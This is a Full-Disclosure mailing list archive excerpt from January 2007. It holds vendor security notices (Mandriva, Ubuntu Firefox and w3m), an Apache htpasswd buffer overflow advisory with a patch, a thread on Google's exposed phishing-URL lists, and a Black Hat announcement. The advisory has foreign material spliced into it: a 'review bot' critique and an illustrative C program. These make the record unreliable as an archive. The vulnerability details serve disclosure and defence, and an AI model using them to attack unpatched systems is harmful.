2007.0/x86_64/kernel-2.6.17.8mdv-1-1mdv2007.0.x86_64.rpm 3cb5a059bc3d352da95fb285f2c31f80 2007.0/x86_64/kernel-source-2.6.17.8mdv-1-1mdv2007.0.x86_64.rpm 9ff265225b8624a083058b5ec16174c2 2007.0/x86_64/kernel-source-stripped-2.6.17.8mdv-1-1mdv2007.0.x86_64.rpm 
23ba072d883bac51179e42df654aba79 2007.0/x86_64/kernel-xen0-2.6.17.8mdv-1-1mdv2007.0.x86_64.rpm 268ac512e41476f1e0df9d94299c317b 2007.0/x86_64/kernel-xenU-2.6.17.8mdv-1-1mdv2007.0.x86_64.rpm 0cb62354da7ae0bd1dd6b851bedd9496 2007.0/SRPMS/kernel-2.6.17.8mdv-1-1mdv2007.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFFmpCqmqjQ0CJFipgRApvgAJwMfzgQzPybB+31urTuthQ/zBBjbwCfaLar C4ZZguRSYKoAlWgt5LYo/tw= =v5w6 -----END PGP SIGNATURE----- From phoenix.diablo at googlemail.com Tue Jan 2 22:17:08 2007 From: phoenix.diablo at googlemail.com (JM) Date: Tue, 2 Jan 2007 23:17:08 +0100 Subject: [Full-disclosure] =?utf-8?q?Google=E2=80=99s_blacklisted_url_data?= =?utf-8?q?base_=28phishing_url_database=29?= In-Reply-To: References: Message-ID: <200701022317.08793.phoenix.diablo@gmail.com> I just played around a bit with those lists and as it seems, Google did a splendid job, even capturing some people's login data. Like here: http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7753 Regards, J.M. Professional Lurker >[By] "Rajesh Sethumadhavan" >[Date] Dienstag, 2. 
Januar 2007 18:42 >[To] full-disclosure at lists.grok.org.uk >[Subject] [Full-disclosure] Google?s blacklisted url database (phishing url >database) > > It is possible to access google`s blacklisted url database ( phishing url > database ) > > http://sb.google.com/safebrowsing/update?version=goog-black-url:1:1 > http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7998 > http://sb.google.com/safebrowsing/update?version=goog-white-domain:1:19,goo >g-white-url:1:371,goog-black-url:1:7693,goog-black-enchash:1:15282 > > > This database (Part of Google Safe Browsing) can be used in any > anti-phishing commercial softwares :) > > Regards > Rajesh Sethumadhavan > http://www.xdisclose.com From php0t at zorro.hu Tue Jan 2 22:48:54 2007 From: php0t at zorro.hu (php0t) Date: Tue, 2 Jan 2007 23:48:54 +0100 Subject: [Full-disclosure] Google's blacklisted url database (phishing url database) In-Reply-To: <200701022317.08793.phoenix.diablo@gmail.com> Message-ID: <001c01c72ec0$2e510a50$650ba8c0@DORKA> How exactly does such data get captured? Somebody placed a link somewhere with the url having the user/password in it ? What would be the point of that? And if not, where did that come from? I peeked at http://www.google.com/tools/firefox/safebrowsing/faq.html to learn more but it only has obvious info. -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of JM Sent: Tuesday, January 02, 2007 11:17 PM To: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure]Google's blacklisted url database (phishing url database) I just played around a bit with those lists and as it seems, Google did a splendid job, even capturing some people's login data. Like here: http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7753 Regards, J.M. Professional Lurker >[By] "Rajesh Sethumadhavan" >[Date] Dienstag, 2. 
Januar 2007 18:42
>[To] full-disclosure at lists.grok.org.uk
>[Subject] [Full-disclosure] Google's blacklisted url database (phishing url
>database)
>
> It is possible to access google`s blacklisted url database ( phishing
> url database )
>
> http://sb.google.com/safebrowsing/update?version=goog-black-url:1:1
> http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7998
> http://sb.google.com/safebrowsing/update?version=goog-white-domain:1:19,goog-white-url:1:371,goog-black-url:1:7693,goog-black-enchash:1:15282
>
>
> This database (Part of Google Safe Browsing) can be used in any
> anti-phishing commercial softwares :)
>
> Regards
> Rajesh Sethumadhavan
> http://www.xdisclose.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

From kf_lists at digitalmunition.com Tue Jan 2 23:16:07 2007
From: kf_lists at digitalmunition.com (K F (lists))
Date: Tue, 02 Jan 2007 18:16:07 -0500
Subject: [Full-disclosure] Whos Johny Pwnerseed?
Message-ID: <459AE7B7.3030602@digitalmunition.com>

You may still be scratching your head from yesterday... don't forget about today and tomorrow:

http://projects.info-pull.com/moab/MOAB-02-01-2007.html

-KF

From gnuler at gmail.com Tue Jan 2 20:20:25 2007
From: gnuler at gmail.com (Matias Soler)
Date: Tue, 2 Jan 2007 17:20:25 -0300
Subject: [Full-disclosure] Apache 1.3.37 htpasswd buffer overflow vulnerability
Message-ID: <47c0571c0701021220r6ad0169l4d0f9d70ffdd7653@mail.gmail.com>

Synopsis: Apache 1.3.37 htpasswd buffer overflow vulnerability
Version: 1.3.37 (latest 1.3.xx)

Product
=======
Apache htpasswd utility

Issue
=====
A buffer overflow vulnerability has been found; it is dangerous only in environments where the binary is suid root.

Details
=======
Incorrect validation of the size of user input allows a string to be copied, via strcpy, into a fixed-size buffer.
File: htpasswd.c, Line 421.

Solution
========
Apply this patch to htpasswd.c

-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-- 415,419c415,420 < if (strlen(argv[i + 1]) > (sizeof(user) - 1)) { < fprintf(stderr, "%s: username too long (>%lu)\n", argv[0], < (unsigned long)(sizeof(user) - 1)); < return ERR_OVERFLOW; < } --- > } > if (strlen(argv[i + 1]) > (sizeof(user) - 1)) { > fprintf(stderr, "%s: username too long (>%lu)\n", argv[0], > (unsigned long)(sizeof(user) - 1)); > return ERR_OVERFLOW; > --->8----->8----->8----->8----->8----->8----->8----->8----->8----->8----->8-----

Affected Versions
==================
1.3.37 - http://www.apache.org/dist/httpd/apache_1.3.37.tar.gz

Notes & References
==================
Another similar bug was discovered by Luiz Fernando [1]; a patch was written by Larry Cashdollar which also fixed the bug I'm posting, but it seems not to have been applied to the latest versions of Apache 1.3.xx. Michael Engert submitted another patch [1] which also fixed this bug and filled out a bug report [1], but it wasn't applied. Have a look at other posts [3][4] on this (and similar) issues. A bug report [5] on this issue was filled out.

Credits
=======
Matias S. Soler - gnuler [at] gmail [dot] com
Luiz Fernando
Michael Engert

1 - http://archives.neohapsis.com/archives/fulldisclosure/2004-09/0547.html
2 - http://issues.apache.org/bugzilla/show_bug.cgi?id=31975
3 - http://seclists.org/bugtraq/2004/Oct/0359.html
4 - http://www.security-express.com/archives/fulldisclosure/2004-10/1117.html
5 - http://issues.apache.org/bugzilla/show_bug.cgi?id=41279

-- Matias S. Soler
-------------- next part --------------
An HTML attachment was scrubbed...
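Review bot: the hunk header 415,419c415,420 promises six replacement lines, but only five `>` lines follow and none of them is the `}` that closes the moved `if`, so the patch as posted does not apply cleanly and has most likely lost its last line between your editor and the list. Please repost it as `diff -u` output with a few lines of context: the fix hinges on the lone `}` that now opens the `>` block, i.e. on moving the length check out of whatever block enclosed it so that it runs before the strcpy on every path, and without the surrounding lines a reader cannot confirm which block that is or that the check is not simply being duplicated.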
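The pattern the advisory describes, as an added example that is not code from the advisory or from Apache's htpasswd.c: a command-line argument copied with strcpy() into a fixed-size buffer, next to the bounded copy that rejects anything that does not fit including the terminating NUL, applied on every path (user name always, password only in batch mode). Buffer sizes, the error code and all function names are illustrative assumptions; the real htpasswd values are not reproduced here.

```c
/*
 * Added example, not code from the advisory or from Apache's htpasswd.c.
 * The assumed buffer size and error code are illustrative.
 */
#include <stdio.h>
#include <string.h>

#define MAX_STRING_LEN 256  /* assumed size of the fixed buffers */
#define ERR_OVERFLOW    5   /* assumed return code for a rejected argument */

struct creds {
    char user[MAX_STRING_LEN];
    char password[MAX_STRING_LEN];
};

/*
 * Vulnerable form: nothing stops a user name longer than user[] from
 * running past the end of the struct. Shown for contrast only; never
 * called by the functions below.
 */
void copy_user_unchecked(struct creds *c, const char *arg)
{
    strcpy(c->user, arg);
}

/*
 * Hardened form: the check counts the terminating NUL, so the longest
 * accepted string is dstsz - 1 bytes, and the copy happens only after
 * the check has passed.
 */
int copy_arg_checked(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (n > dstsz - 1)
        return ERR_OVERFLOW;
    memcpy(dst, src, n + 1);
    return 0;
}

/*
 * Both arguments go through the same check: the user name on every
 * path, the password whenever it was supplied on the command line
 * (batch mode). A check that lives inside only one branch is exactly
 * the kind of gap a patch like the one above has to close.
 */
int parse_args(struct creds *c, int batch, const char *user, const char *pw)
{
    int rc;
    memset(c, 0, sizeof *c);
    rc = copy_arg_checked(c->user, sizeof c->user, user);
    if (rc != 0)
        return rc;
    if (batch) {
        rc = copy_arg_checked(c->password, sizeof c->password, pw);
        if (rc != 0)
            return rc;
    }
    return 0;
}

/* Constructed inputs for the checks below. */
static void fill(char *buf, size_t len, char ch)
{
    memset(buf, ch, len);
    buf[len] = '\0';
}

int demo_short_user(void)               /* "alice" fits: returns 0 */
{
    struct creds c;
    return parse_args(&c, 1, "alice", "s3cret");
}

int demo_exact_fit(void)                /* 255 bytes + NUL fits exactly: 0 */
{
    struct creds c;
    char name[MAX_STRING_LEN];
    fill(name, MAX_STRING_LEN - 1, 'a');
    return parse_args(&c, 0, name, NULL);
}

int demo_user_too_long(void)            /* 256 bytes: ERR_OVERFLOW */
{
    struct creds c;
    char name[MAX_STRING_LEN + 1];
    fill(name, MAX_STRING_LEN, 'a');
    return parse_args(&c, 0, name, NULL);
}

int demo_batch_password_too_long(void)  /* oversized -b password: ERR_OVERFLOW */
{
    struct creds c;
    char pw[2 * MAX_STRING_LEN];
    fill(pw, 2 * MAX_STRING_LEN - 1, 'p');
    return parse_args(&c, 1, "alice", pw);
}

int main(void)
{
    printf("short user: %d\n", demo_short_user());
    printf("exact fit: %d\n", demo_exact_fit());
    printf("user too long: %d\n", demo_user_too_long());
    printf("batch password too long: %d\n", demo_batch_password_too_long());
    return 0;
}
```

The exact-fit case is the one worth keeping in a regression test: a check written as `strlen(src) > dstsz` instead of `> dstsz - 1` still lets the NUL land one byte past the buffer.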
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070102/71297307/attachment.html From jmoss at blackhat.com Tue Jan 2 23:40:15 2007 From: jmoss at blackhat.com (Jeff Moss) Date: Tue, 02 Jan 2007 15:40:15 -0800 Subject: [Full-disclosure] Black Hat New Years Updates (Free Stuff, too!) Message-ID: <200701022341.l02Nfv2c013966@colossus.datamerica.com> Hey Full Disclosure readers, Here are some announcements from Black Hat to keep you busy in the new year! - The Call for Papers and conference registration is now open for the Black Hat DC Training and Briefings. - The Call for Papers and conference registration for Black Hat Europe in open. - Registration for the summer Black Hat USA conference is now open! - Presentations from Black Hat Japan are now on-line. - Presentations including audio and video from Black Hat USA is now on-line. UPCOMING CONFERENCES: Black Hat DC 2007 Briefings & Training will be February 26 to March 1, held at the Sheraton Crystal City hotel in Arlington Virginia. Register early to take advantage of our early bird rate and save when you register for the Briefings before January 1st. Papers and requests to speak will be received and reviewed from October 1, 2006 until January 5, 2007. We strongly suggest that you submit earlier than later, since we will close the CFP early if we receive enough quality submissions to fill the slots. Please submit using the new on-line system at: https://cfp.blackhat.com/ If you want to submit to the Call for Papers please note Black Hat does not accept product or vendor related pitches, or voodoo. If your talk is a veiled advertisement for a new product or service your company is offering, please do not submit. If your talk relies on voodoo techniques or tools you are not willing to share, then you should rethink the benefit the audience will get from sitting through your presentation. Black Hat is launching its new electronic CFP submissions server with this announcement. 
You will be able to upload your submissions, make changes, select your co-presenters, etc. This system will allow you to submit multiple presentations as well as be able to change your info should you need to. This new submission and review process will enable the future possibility of peer review and on-line information exchange. For now we are looking forward to seeing your submissions and would like to hear any feedback you have on this new submission process. Topic Focus for Black Hat DC 2007: We would like presenters to think about offensive and defensive computer security operations and the application of your expertise and research. Think about its application in an operational process that can be defensive or offense, large enterprise or distributed organized criminal group, military or civilian. This is not a requirement to submit, but we want some differentiation for the DC conference. Thinking in terms of operational applicability will steer content in a direction we hope the DC audience will appreciate. Dates to Remember for Black Hat DC: Call for Papers closes: January 5, 2007. <-- Extended to the 5th. Early Bird registration rate ends December 31. Regular registration rate ends February 18th. More information regarding speaker requirements and our guidelines for this years submissions available at http://www.blackhat.com/ Black Hat Europe 2007 Briefings & Training will be March 27 to March 30, held at the Hotel Movenpick in Amsterdam. Dates to Remember for Black Hat Europe: Call for Papers will open November 1, 2006 and close February 1st, 2007. Registration will open November 1, 2006 and the Early Bird rate ends January 12, 2007. On-line registration closes March 18, 2007. Black Hat USA 2007 Briefings & Training will be July 28 to August 2, held at Caesars Palace in Las Vegas, Nevada, USA On-line Registration for Briefings now open. Training registration will open February 15. Call for Papers will open February 15. Hotel Reservations now open. 
Black Hat Japan 2007 Briefings & Training will be October 23-26, Tokyo, Japan On-line Registration will open July 1. Call for Papers will open May 1. FREE STUFF: Black Hat Japan 2006 Presentations are now available on-line! http://www.blackhat.com/html/bh-media-archives/bh-archives-2006.html#AS_2006 Presentation topics available include: Anti-Forensic Root kits, The Art and Science of Writing Secure Code, Hacking Intranet web sites from the Outside, Breaking AJAX Web Applications, Subverting Vista Kernel and more! Audio of the sessions will be encoded and added on-line in the next month as well. http://www.blackhat.com/html/bh-japan-06/bh-jp-06-en-speakers.html We also have the presentation material from USA 2006 show on-line, and we anticipate we will have audio and video of the presentations available for download within the next month. To view the entire media archives: http://www.blackhat.com/html/bh-multimedia-archives-index.html Black Hat USA Briefings audio and video are now available to download in an iPod friendly format: http://www.blackhat.com/podcast/bh-usa-06-audio.rss http://www.blackhat.com/podcast/bh-usa-06-video.rss The General Black Hat RSS feed: http://www.blackhat.com/BlackHatRSS.xml Thank you, Jeff Moss From kees at ubuntu.com Wed Jan 3 02:41:39 2007 From: kees at ubuntu.com (Kees Cook) Date: Tue, 2 Jan 2007 18:41:39 -0800 Subject: [Full-disclosure] [USN-398-1] Firefox vulnerabilities Message-ID: <20070103024138.GR4462@outflux.net> =========================================================== Ubuntu Security Notice USN-398-1 January 02, 2007 firefox vulnerabilities CVE-2006-6497, CVE-2006-6498, CVE-2006-6499, CVE-2006-6501, CVE-2006-6502, CVE-2006-6503, CVE-2006-6504, CVE-2006-6506, CVE-2006-6507 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. 
The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.10: firefox 2.0.0.1+0dfsg-0ubuntu0.6.10 firefox-dev 2.0.0.1+0dfsg-0ubuntu0.6.10 libnspr-dev 2.0.0.1+0dfsg-0ubuntu0.6.10 libnspr4 2.0.0.1+0dfsg-0ubuntu0.6.10 libnss-dev 2.0.0.1+0dfsg-0ubuntu0.6.10 libnss3 2.0.0.1+0dfsg-0ubuntu0.6.10 After a standard system upgrade you need to restart Firefox to effect the necessary changes. Details follow: Various flaws have been reported that allow an attacker to execute arbitrary code with user privileges by tricking the user into opening a malicious web page containing JavaScript or SVG. (CVE-2006-6497, CVE-2006-6498, CVE-2006-6499, CVE-2006-6501, CVE-2006-6502, CVE-2006-6504) Various flaws have been reported that allow an attacker to bypass Firefox's internal XSS protections by tricking the user into opening a malicious web page containing JavaScript. (CVE-2006-6503, CVE-2006-6507) Jared Breland discovered that the "Feed Preview" feature could leak referrer information to remote servers. 
(CVE-2006-6506) Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.1+0dfsg-0ubuntu0.6.10.diff.gz Size/MD5: 322554 79c04227229a107f0c9d45049605bd48 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.1+0dfsg-0ubuntu0.6.10.dsc Size/MD5: 1218 6ce84b9960bdbb97c9ec6c3705653eae http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.1+0dfsg.orig.tar.gz Size/MD5: 46670638 1cb13be9a35205af63fe70eeff14eb0e Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_2.0.0.1+0dfsg-0ubuntu0.6.10_all.deb Size/MD5: 236456 9ed7043d22624085cffc10dc7cde8f26 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_2.0.0.1+0dfsg-0ubuntu0.6.10_all.deb Size/MD5: 55270 2f8fde2f2488af7750e65e886493cd13 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dom-inspector_2.0.0.1+0dfsg-0ubuntu0.6.10_all.deb Size/MD5: 55362 eb1b5c963f64a784e053bdeee6537481 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-gnome-support_2.0.0.1+0dfsg-0ubuntu0.6.10_all.deb Size/MD5: 55378 dd6516fe8c1798d617bcf95b4fbd21c4 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox_2.0.0.1+0dfsg-0ubuntu0.6.10_all.deb Size/MD5: 56176 eae029799af7b101a55a9bfdffc88330 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.1+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 50310432 263fa952660d303d4320ac519836a1fb http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.1+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 3119132 75d94b87d53efb786ffdf56ff6d6b075 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.1+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 89652 913420b9f378f322c1ca1b02037f2677 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.1+0dfsg-0ubuntu0.6.10_amd64.deb 
Size/MD5: 10387770 78104d3965f2bfbda5575574d9f755ba http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 225036 ea87d34202b6d3223dbac099cf51c8df http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 167466 55bbefb531652d568f02438aeed10f1d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 250348 1bbc07d9af10768ac6656d927000abcd http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 861350 3fc1cbb4e1eb02995567cdec7b660bd2 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.1+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 49457428 a30d035ca9fd1819091c1c6b48d325b1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.1+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 3109488 e86991da3947ee093b840abd83cf07b2 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.1+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 83386 77793d13bf5a26f0c43962ac5fbd186c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.1+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 9207840 8dcf11221cfef75bf7f51422dcf60dd7 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 225046 90012c5f90396f6a5db7705b243e2521 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 156952 80817ef1fbd45ddfbdfdf75279275c34 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 250336 655f2f4a30dae71ec29bf96cfb7f0229 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 785180 
131a2623fa95997b99085884204fd89a powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.1+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 51980774 4865d18b50b3a10dfd1b228e11ac0435 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.1+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 3115886 c6f8efcab8edfd7b83453ee041a24612 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.1+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 85272 b66da0f160a453b1f3ee18f5b1722e8d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.1+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 10056020 9102c8484c7c71186fd0b970a610e7e4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 225038 4f83154583b4a058a123a3a8586ab0f2 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 166288 6190cda57dbebe29c65c1ca97daba292 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 250334 b3f846f1dafbf1a990ab27df8258b9e1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 860068 d0f2e68e9d1ca8be8d9914e6fcdf1bff sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.1+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 49511534 d0e1bad8c05a69231dfee2db6b34b990 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.1+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 3106194 1adc42b08102dca85285244139d312da http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.1+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 83086 ef47b587d79afdce14ec47b2e13ce89c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.1+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 
9485274 13146d26d590e4981281cf21957cfb61 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 225036 b72f082c255cd9510435cd0c0912a5bc http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 155116 9d629deae12ea27812081b13bb0216ba http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 250332 c3e90b969d3c3de2fe47c4942f8dc96f http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 766060 a32f928bcb9a7cd2d601b2aafbec6bef -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070102/9d7725b1/attachment.bin From kees at ubuntu.com Wed Jan 3 03:34:42 2007 From: kees at ubuntu.com (Kees Cook) Date: Tue, 2 Jan 2007 19:34:42 -0800 Subject: [Full-disclosure] [USN-399-1] w3m vulnerabilities Message-ID: <20070103033442.GT4462@outflux.net> =========================================================== Ubuntu Security Notice USN-399-1 January 03, 2007 w3m vulnerabilities http://sf.net/tracker/?func=detail&aid=1612792&group_id=39518&atid=425439 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: w3m 0.5.1-3ubuntu1.1 Ubuntu 6.06 LTS: w3m 0.5.1-4ubuntu2.6.06 Ubuntu 6.10: w3m 0.5.1-4ubuntu2.6.10 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: A format string vulnerability was discovered in w3m. 
If a user were tricked into visiting an HTTPS URL protected by a specially crafted SSL certificate, an attacker could execute arbitrary code with user privileges. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-3ubuntu1.1.diff.gz Size/MD5: 26918 6c80b8da1759df35d0fbbbfd762be482 http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-3ubuntu1.1.dsc Size/MD5: 714 d5fab4328a132271d45443b0c62c9c5f http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1.orig.tar.gz Size/MD5: 1892121 0678b72e07e69c41709d71ef0fe5da13 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/w/w3m/w3m-img_0.5.1-3ubuntu1.1_amd64.deb Size/MD5: 90086 e9be4901190f36350b7c3906e8d5c7c0 http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-3ubuntu1.1_amd64.deb Size/MD5: 1119434 544af8fe74b78b80b85b0618934e993f i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/w/w3m/w3m-img_0.5.1-3ubuntu1.1_i386.deb Size/MD5: 88984 b39f657ec9c7fc9f0b66eccf6548ecfd http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-3ubuntu1.1_i386.deb Size/MD5: 1062408 4681dd0f0799ac9418ae11f17c39efb6 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/w/w3m/w3m-img_0.5.1-3ubuntu1.1_powerpc.deb Size/MD5: 91540 47fbc7739850d784fea04b739763a79b http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-3ubuntu1.1_powerpc.deb Size/MD5: 1120800 43549c92dd35b1b1945fefed4c10caad sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/universe/w/w3m/w3m-img_0.5.1-3ubuntu1.1_sparc.deb Size/MD5: 89256 e9975d718fb34e212ab9471a19b293b8 http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-3ubuntu1.1_sparc.deb Size/MD5: 1087110 ac0ece82654dc503f9aff5c961d766ae Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-4ubuntu2.6.06.diff.gz 
Size/MD5: 35266 4eb07f00d81679ccf53f5c50c3cf5403 http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-4ubuntu2.6.06.dsc Size/MD5: 702 ced346058b3f71ecec26652b9aa919d7 http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1.orig.tar.gz Size/MD5: 1892121 0678b72e07e69c41709d71ef0fe5da13 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/w/w3m/w3m-img_0.5.1-4ubuntu2.6.06_amd64.deb Size/MD5: 88458 ac45f4fade3fa7f60643b18553ccfb32 http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-4ubuntu2.6.06_amd64.deb Size/MD5: 1119712 d48a1acda4b04bd2b8870d7328d471af i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/w/w3m/w3m-img_0.5.1-4ubuntu2.6.06_i386.deb Size/MD5: 87464 790cddd717ef3d53576cd44325bbe74c http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-4ubuntu2.6.06_i386.deb Size/MD5: 1061434 1309934c6ce36eddc7d1fe10c8a397d7 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/w/w3m/w3m-img_0.5.1-4ubuntu2.6.06_powerpc.deb Size/MD5: 89786 7a5076bb3784d7c3ee23a83a799c006e http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-4ubuntu2.6.06_powerpc.deb Size/MD5: 1120114 a3464f27e707e26c6282a0913e485330 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/universe/w/w3m/w3m-img_0.5.1-4ubuntu2.6.06_sparc.deb Size/MD5: 87854 